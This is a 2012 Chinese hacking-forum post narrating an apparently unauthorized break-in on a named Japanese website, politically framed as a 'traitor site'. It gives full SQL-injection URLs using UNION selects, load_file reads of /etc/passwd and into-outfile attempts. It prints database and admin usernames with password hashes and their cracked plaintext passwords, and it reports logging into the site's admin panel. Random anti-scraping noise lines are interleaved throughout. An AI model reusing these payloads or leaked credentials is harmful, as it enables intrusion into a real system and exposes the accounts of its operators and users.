中国网络渗透测试联盟
标题:
原创 检测汉奸站全过程
[打印本页]
作者:
xiancda
时间:
2012-9-17 16:22
标题:
原创 检测汉奸站全过程
补:
www.zuaa.jp
测试
- B0 X5 }5 h' ~- d; H# m8 m) A
& B1 \. {* }2 ~6 ^! O
0x01. 检测
www.zuaa.jp
收集数据
* W+ b) q$ m- `2 [6 O* q# X; @" ~, d
[attach]73[/attach]
! N5 F0 K- [3 M# i9 @- A* y; {2 _7 S
) A: h' u0 u, Y0 I& R# d4 s: V {) G' U
whatweb
' q' H/ _ @3 O, `/ Q
[attach]74[/attach]
]! O8 ?3 Q* d
/ a, ]# o/ `7 D
利用NMAP扫描
8 f2 }4 y; V; ?2 J% i& u+ P& E+ h, ]* y
[attach]75[/attach]
; u, r( J; o% V
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
, s6 O- V1 n' c# h
0x02.找注入点
4 q' I7 y/ k+ \3 v( J
找注入点:
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
3 t- S) v \2 g8 m! B" i
[attach]76[/attach]
# u: v0 [+ |7 ?1 b2 H
7 d- S. q1 q8 e
0x03.order by
9 p2 H4 Q3 E, m+ n9 W, _
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
order by 1
1 k1 ~+ D5 w$ x; Q2 Z
[attach]77[/attach]
+ @1 T( }% g+ n7 _8 d3 w$ G
order by 28报错,order by 27正常
* n( e0 m) N6 p& r* F1 x
4 \% Q' A+ a- ]. Y( w
0x04. union手动查询
3 D2 F7 O8 U; X1 ^6 Z
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
% {! `# h, @: w2 H5 |, Y" ^
添加到 27 时正常显示
j, b, S- X% D7 |
[attach]78[/attach]
' l1 }6 C, p1 q
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
# x+ C7 `7 n+ r1 Z' y" F1 `
& z+ b- v4 K s/ n2 `2 q( F
0x05. info:
0 y8 k' D2 z. r2 i0 y1 f( P" S
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
2 J y q" F2 Y2 J3 @
[attach]79[/attach]
! s! D4 b& h+ k/ [, q3 ~
user: root@localhost
6 r8 F. e9 _2 A6 y' T4 d5 f+ t
database: openpne
/ R: W) a# j7 `- V. K
version: 4.1.22
2 M3 G% g6 l% ^ h7 D
os: portbld-freebsd5.4
! G1 B; P \* p; P7 ]
- ^+ ?: u9 M) v6 F) y5 F
0x06. root用户
: |/ |9 s0 T( c' ^) m
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
- N) x5 X8 L( T, E+ R1 d1 P7 H
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
$ W$ F( S" L `5 K
[attach]80[/attach]
- P0 d9 z+ D6 j t' Q- h& ?/ r
通过工具转换
+ l1 j# K Y, H' a& t
[attach]81[/attach]
- H$ ~ {% O# h3 T
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
* _9 ]) g) M Z o6 k: C8 n4 l. \
; j8 |) D+ q+ S: k. Y8 z" A
0x07. 利用 into outfile
0 A' M4 r$ I2 y5 ~ Y0 v% e
全部都失败
" T% b& {8 x! i: O& E x& s
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
) K' z5 Y7 d1 ]5 U0 `2 {$ m
1 k( @- c& ~0 z6 \. {
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
# b: a, V' w( f! ^+ I! n
5 v# ^$ |, D. F3 |+ }, {! C
页面显示“MDB2 Error:syntax error”
) S4 O& P% W+ R' L$ |+ t5 S$ ?+ m
8 l% H3 f, ?8 ? I! N( e& x
0x08. 利用 mysql 4.1
+ e8 B( b& F* B
猜常规表名,字段未果 工具 sqlmap
: r5 d, o( N; s2 q6 n
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
0 ~8 l& O: Y& m' j
3 x: Q& ^, ?& L( o' f# U/ k) U3 ^$ F6 _
[attach]82[/attach]
8 w" G6 o' v/ K0 x
7 x# ^& f: c' ~; f; Z9 s: s! p& \
0x09. 查找后台
' p" f4 j- n9 Z, W1 S
利用 现有的各种 后台工具尝试都不行
" M N& l7 l6 q5 r% O P
, U( G6 N0 z. r+ i
0x10. MySL外联方法
* h9 @7 \5 {. [; g5 L$ R
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连
www.zuaa.jp
不行
; \2 v( T2 g5 o/ |" b, M
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
8 N% p! o$ g0 w" a
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
0 L* k1 q) X! y
[attach]83[/attach]
$ H0 ?& n" y: D6 w& h% M
这个可以在
www.cmd5.com
解密
/ T$ p! `! H& c3 Y$ ^( f
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
$ l( B, \( {( {0 |5 X9 [7 m7 L7 \. U
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
8 Q: q7 r* c9 V
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
( E: w( |% H3 q
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
/ x) W/ v* m- k' z) V/ {
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
- w' U% _$ v/ L9 z4 ^
[attach]84[/attach]
w+ z' [' N k3 _% @4 t
# o, ~" f% F+ n
0x11. 网站突破
8 q9 ]" N% W( ` B% z
发现网站的源程序 openpne, google 下载 openpne 源码
1 q/ }$ h( k- [2 C
[attach]85[/attach]
, K4 b% g7 G. x# L6 [4 Y! o
& m8 B0 o" M+ c W2 p8 b, O
0x12. 默认信息利用
, G& s. P0 Y% M3 f1 B8 a
http://sns.zuaa.jp/?m=admin&a=page_login
! q/ o0 O6 g$ i# r; v" r ~
[attach]86[/attach]
* p0 D+ e& W9 @& F' k% ?( \
表名 (c_admin_user) ,字段名(username,password)
) h$ n) c" f" H) h" K
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
1 J5 k) X2 M! P3 Q
[attach]87[/attach]
; J o, I. t8 k) i0 [2 V6 i3 H" g
解密
5 v( r# Y& v, x/ ^; ~" k, Q- P
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
$ l/ ^. Q) Q# P$ B# _
zuaajp:c0923ec5857796a393da99905008c176, zju1897
$ d7 j5 n, b9 G
% m% P, {3 V6 K, w
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
' M/ Z9 K& `: ?4 d9 j) }5 W
% Y, _" t; K/ ?! S. E& c
0x13. 登录后台
$ h, z" {6 _, g; R$ E) N
[attach]88[/attach]
?1 ?2 l/ w4 s8 ~) y
3 h* o" N9 q6 ~' Q7 n& {; ?
) w0 m! J( X" Q$ S7 L1 e
0x14. 小结
$ t5 D0 [( X' a9 L1 }% }
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
\4 z' ^; V& K ^) o
感谢群 ----
渗透 -酷帅王子
提供注入点 提供注入点
- ] z0 k6 j! j* t" G: n+ P
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------
By DarkRain
2 C( @5 v/ W* I8 a
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
, W- F! } J1 ~! U" ]! Q( A
# k# ^5 U+ N6 \& W4 f/ [: c
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
2 \7 k) ~# {' c; ~
作者:
荒村狂客
时间:
2012-9-19 08:27
哪个牛人 费的这劲 入侵的
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2